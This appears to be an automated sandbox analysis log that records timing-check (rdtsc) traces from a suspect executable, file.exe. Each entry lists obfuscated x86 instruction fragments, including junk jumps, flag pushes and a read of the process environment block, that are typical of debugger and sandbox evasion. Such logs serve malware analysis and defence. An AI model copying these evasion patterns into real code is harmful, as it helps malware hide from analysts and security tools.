Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726023E second address: 7260242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260242 second address: 7260278 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call dword ptr [75980B60h] 0x00000011 mov eax, 75F3E5E0h 0x00000016 ret 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F70F0BCDB15h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260278 second address: 726027F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726027F second address: 72602B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push 00000044h 0x00000009 jmp 00007F70F0BCDB19h 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F70F0BCDB0Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72602B1 second address: 7260325 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 11FF5532h 0x00000008 pushfd 0x00000009 jmp 00007F70F070E5D3h 0x0000000e sub ax, 972Eh 0x00000013 jmp 00007F70F070E5D9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, edi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov di, 448Eh 0x00000024 pushfd 0x00000025 jmp 00007F70F070E5CFh 0x0000002a sbb ah, 0000003Eh 0x0000002d jmp 00007F70F070E5D9h 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260325 second address: 726032B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726032B second address: 726032F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726032F second address: 7260333 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260333 second address: 7260370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F70F070E5CBh 0x00000010 adc si, 2F4Eh 0x00000015 jmp 00007F70F070E5D9h 0x0000001a popfd 0x0000001b popad 0x0000001c xchg eax, edi 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260370 second address: 7260376 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260376 second address: 726039A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 mov edx, 1B2C73E0h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push dword ptr [eax] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F70F070E5D2h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726039A second address: 72603AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F0BCDB0Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72603AC second address: 72603B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72603B0 second address: 72603F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000030h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F70F0BCDB18h 0x00000017 jmp 00007F70F0BCDB15h 0x0000001c popfd 0x0000001d mov di, cx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72603F4 second address: 7260409 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bl 0x00000005 mov cx, EDFBh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push dword ptr [eax+18h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260409 second address: 726040D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726040D second address: 7260411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260411 second address: 7260417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726044C second address: 7260487 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F70F070E5D8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260487 second address: 7260496 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260496 second address: 72604BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F70F070E5D9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72604BC second address: 72604C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72604C1 second address: 72604C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72604C7 second address: 7260538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 je 00007F715F29CCE0h 0x0000000d pushad 0x0000000e mov ax, di 0x00000011 pushfd 0x00000012 jmp 00007F70F0BCDB0Bh 0x00000017 adc ah, FFFFFFBEh 0x0000001a jmp 00007F70F0BCDB19h 0x0000001f popfd 0x00000020 popad 0x00000021 sub eax, eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushfd 0x00000027 jmp 00007F70F0BCDB13h 0x0000002c add ah, FFFFFFCEh 0x0000002f jmp 00007F70F0BCDB19h 0x00000034 popfd 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260538 second address: 7260589 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F70F070E5D0h 0x00000008 sbb esi, 48A67048h 0x0000000e jmp 00007F70F070E5CBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushfd 0x00000019 jmp 00007F70F070E5D6h 0x0000001e add ax, B2A8h 0x00000023 jmp 00007F70F070E5CBh 0x00000028 popfd 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260589 second address: 72605DC instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F70F0BCDB18h 0x00000008 adc eax, 55E9A508h 0x0000000e jmp 00007F70F0BCDB0Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov dword ptr [esi], edi 0x00000019 jmp 00007F70F0BCDB16h 0x0000001e mov dword ptr [esi+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov bl, 9Bh 0x00000026 push eax 0x00000027 pop edx 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72605DC second address: 72605EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72605EE second address: 7260687 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+08h], eax 0x0000000e pushad 0x0000000f call 00007F70F0BCDB14h 0x00000014 mov ah, DDh 0x00000016 pop edi 0x00000017 mov cl, 67h 0x00000019 popad 0x0000001a mov dword ptr [esi+0Ch], eax 0x0000001d jmp 00007F70F0BCDB0Fh 0x00000022 mov eax, dword ptr [ebx+4Ch] 0x00000025 pushad 0x00000026 mov cl, 7Ah 0x00000028 pushfd 0x00000029 jmp 00007F70F0BCDB11h 0x0000002e xor ecx, 63D022F6h 0x00000034 jmp 00007F70F0BCDB11h 0x00000039 popfd 0x0000003a popad 0x0000003b mov dword ptr [esi+10h], eax 0x0000003e jmp 00007F70F0BCDB0Eh 0x00000043 mov eax, dword ptr [ebx+50h] 0x00000046 pushad 0x00000047 mov cx, F0ADh 0x0000004b push ecx 0x0000004c mov ax, bx 0x0000004f pop edi 0x00000050 popad 0x00000051 mov dword ptr [esi+14h], eax 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260687 second address: 726069F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F070E5D3h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726069F second address: 72606F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+54h] 0x0000000c jmp 00007F70F0BCDB0Eh 0x00000011 mov dword ptr [esi+18h], eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushfd 0x00000018 jmp 00007F70F0BCDB0Ch 0x0000001d xor si, 7338h 0x00000022 jmp 00007F70F0BCDB0Bh 0x00000027 popfd 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72606F1 second address: 726075F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dx, cx 0x0000000c popad 0x0000000d mov eax, dword ptr [ebx+58h] 0x00000010 pushad 0x00000011 mov ebx, esi 0x00000013 mov cl, 7Bh 0x00000015 popad 0x00000016 mov dword ptr [esi+1Ch], eax 0x00000019 pushad 0x0000001a call 00007F70F070E5D7h 0x0000001f mov bx, si 0x00000022 pop eax 0x00000023 push ebx 0x00000024 call 00007F70F070E5D0h 0x00000029 pop eax 0x0000002a pop edx 0x0000002b popad 0x0000002c mov eax, dword ptr [ebx+5Ch] 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F70F070E5CDh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726075F second address: 7260764 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260764 second address: 7260777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, bx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esi+20h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260777 second address: 726077B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726077B second address: 726077F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726077F second address: 7260785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260785 second address: 726079F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5D6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726079F second address: 72607CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+60h] 0x0000000e pushad 0x0000000f mov bx, cx 0x00000012 mov ecx, 0E49C8C7h 0x00000017 popad 0x00000018 mov dword ptr [esi+24h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e movsx edx, si 0x00000021 mov bx, si 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72607CA second address: 7260866 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 movzx esi, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [ebx+64h] 0x0000000f pushad 0x00000010 mov cl, dh 0x00000012 jmp 00007F70F070E5D6h 0x00000017 popad 0x00000018 mov dword ptr [esi+28h], eax 0x0000001b jmp 00007F70F070E5D0h 0x00000020 mov eax, dword ptr [ebx+68h] 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F70F070E5CEh 0x0000002a or ch, 00000068h 0x0000002d jmp 00007F70F070E5CBh 0x00000032 popfd 0x00000033 jmp 00007F70F070E5D8h 0x00000038 popad 0x00000039 mov dword ptr [esi+2Ch], eax 0x0000003c jmp 00007F70F070E5D0h 0x00000041 mov ax, word ptr [ebx+6Ch] 0x00000045 pushad 0x00000046 mov ah, bh 0x00000048 popad 0x00000049 mov word ptr [esi+30h], ax 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260866 second address: 726086C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726086C second address: 7260872 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260872 second address: 7260876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260876 second address: 726087A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726087A second address: 726089B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [ebx+00000088h] 0x0000000f pushad 0x00000010 mov di, ax 0x00000013 mov dl, cl 0x00000015 popad 0x00000016 mov word ptr [esi+32h], ax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov bx, ax 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726089B second address: 72608AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5CBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260973 second address: 72609E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F70F0BCDB17h 0x00000009 sub cx, 79BEh 0x0000000e jmp 00007F70F0BCDB19h 0x00000013 popfd 0x00000014 mov ah, 9Bh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push 00000001h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F70F0BCDB14h 0x00000024 sbb cx, 29E8h 0x00000029 jmp 00007F70F0BCDB0Bh 0x0000002e popfd 0x0000002f pushad 0x00000030 popad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72609E0 second address: 72609E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72609E6 second address: 72609EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72609EA second address: 72609EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72609EE second address: 7260A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007F70F0BCDB0Ah 0x0000000e mov dword ptr [esp], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F70F0BCDB17h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260A1D second address: 7260ADC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c jmp 00007F70F070E5CEh 0x00000011 nop 0x00000012 pushad 0x00000013 movzx esi, bx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F70F070E5D4h 0x0000001d sub ax, 9368h 0x00000022 jmp 00007F70F070E5CBh 0x00000027 popfd 0x00000028 popad 0x00000029 popad 0x0000002a push eax 0x0000002b pushad 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F70F070E5D5h 0x00000033 xor ch, FFFFFF86h 0x00000036 jmp 00007F70F070E5D1h 0x0000003b popfd 0x0000003c pushfd 0x0000003d jmp 00007F70F070E5D0h 0x00000042 and al, 00000028h 0x00000045 jmp 00007F70F070E5CBh 0x0000004a popfd 0x0000004b popad 0x0000004c popad 0x0000004d nop 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F70F070E5D0h 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260B37 second address: 7260B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260B3C second address: 7260B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260B42 second address: 7260BCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F715F29C67Fh 0x0000000e pushad 0x0000000f jmp 00007F70F0BCDB13h 0x00000014 mov di, ax 0x00000017 popad 0x00000018 mov eax, dword ptr [ebp-0Ch] 0x0000001b jmp 00007F70F0BCDB12h 0x00000020 mov dword ptr [esi+04h], eax 0x00000023 jmp 00007F70F0BCDB10h 0x00000028 lea eax, dword ptr [ebx+78h] 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F70F0BCDB0Eh 0x00000032 and ah, 00000068h 0x00000035 jmp 00007F70F0BCDB0Bh 0x0000003a popfd 0x0000003b push eax 0x0000003c push ebx 0x0000003d pop ecx 0x0000003e pop ebx 0x0000003f popad 0x00000040 push 00000001h 0x00000042 pushad 0x00000043 mov ax, CAF3h 0x00000047 mov cx, 234Fh 0x0000004b popad 0x0000004c nop 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260BCA second address: 7260BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260BCE second address: 7260BE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260BE5 second address: 7260C56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov eax, edi 0x0000000d mov di, 246Eh 0x00000011 popad 0x00000012 nop 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F70F070E5CBh 0x0000001a xor ax, 851Eh 0x0000001f jmp 00007F70F070E5D9h 0x00000024 popfd 0x00000025 popad 0x00000026 lea eax, dword ptr [ebp-08h] 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F70F070E5D8h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260C56 second address: 7260CF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F70F0BCDB17h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e pushad 0x0000000f movzx ecx, di 0x00000012 pushfd 0x00000013 jmp 00007F70F0BCDB11h 0x00000018 and ecx, 7B09BE16h 0x0000001e jmp 00007F70F0BCDB11h 0x00000023 popfd 0x00000024 popad 0x00000025 push eax 0x00000026 jmp 00007F70F0BCDB11h 0x0000002b nop 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F70F0BCDB0Ch 0x00000033 and esi, 5F233968h 0x00000039 jmp 00007F70F0BCDB0Bh 0x0000003e popfd 0x0000003f push eax 0x00000040 push edx 0x00000041 call 00007F70F0BCDB16h 0x00000046 pop eax 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260D18 second address: 7260D2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260D2A second address: 7260D2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260D2E second address: 7260D3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260D3E second address: 7260D42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260D42 second address: 7260D46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260D46 second address: 7260D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260D4C second address: 7260DEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b pushad 0x0000000c mov dx, si 0x0000000f popad 0x00000010 js 00007F715EDDCF1Dh 0x00000016 jmp 00007F70F070E5CDh 0x0000001b mov eax, dword ptr [ebp-04h] 0x0000001e jmp 00007F70F070E5CEh 0x00000023 mov dword ptr [esi+08h], eax 0x00000026 jmp 00007F70F070E5D0h 0x0000002b lea eax, dword ptr [ebx+70h] 0x0000002e pushad 0x0000002f mov cx, 091Dh 0x00000033 mov si, 1A19h 0x00000037 popad 0x00000038 push 00000001h 0x0000003a jmp 00007F70F070E5D4h 0x0000003f nop 0x00000040 jmp 00007F70F070E5D0h 0x00000045 push eax 0x00000046 pushad 0x00000047 mov bh, 0Ch 0x00000049 popad 0x0000004a nop 0x0000004b pushad 0x0000004c jmp 00007F70F070E5D2h 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 pop edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260DEA second address: 7260E43 instructions: 0x00000000 rdtsc 0x00000002 call 00007F70F0BCDB0Ch 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b lea eax, dword ptr [ebp-18h] 0x0000000e jmp 00007F70F0BCDB11h 0x00000013 nop 0x00000014 jmp 00007F70F0BCDB0Eh 0x00000019 push eax 0x0000001a jmp 00007F70F0BCDB0Bh 0x0000001f nop 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F70F0BCDB15h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260E87 second address: 7260EBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007F70F070E5D3h 0x00000013 pop eax 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260EBE second address: 7260EF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F715F29C2DEh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov bh, 1Bh 0x00000014 jmp 00007F70F0BCDB14h 0x00000019 popad 0x0000001a rdtsc
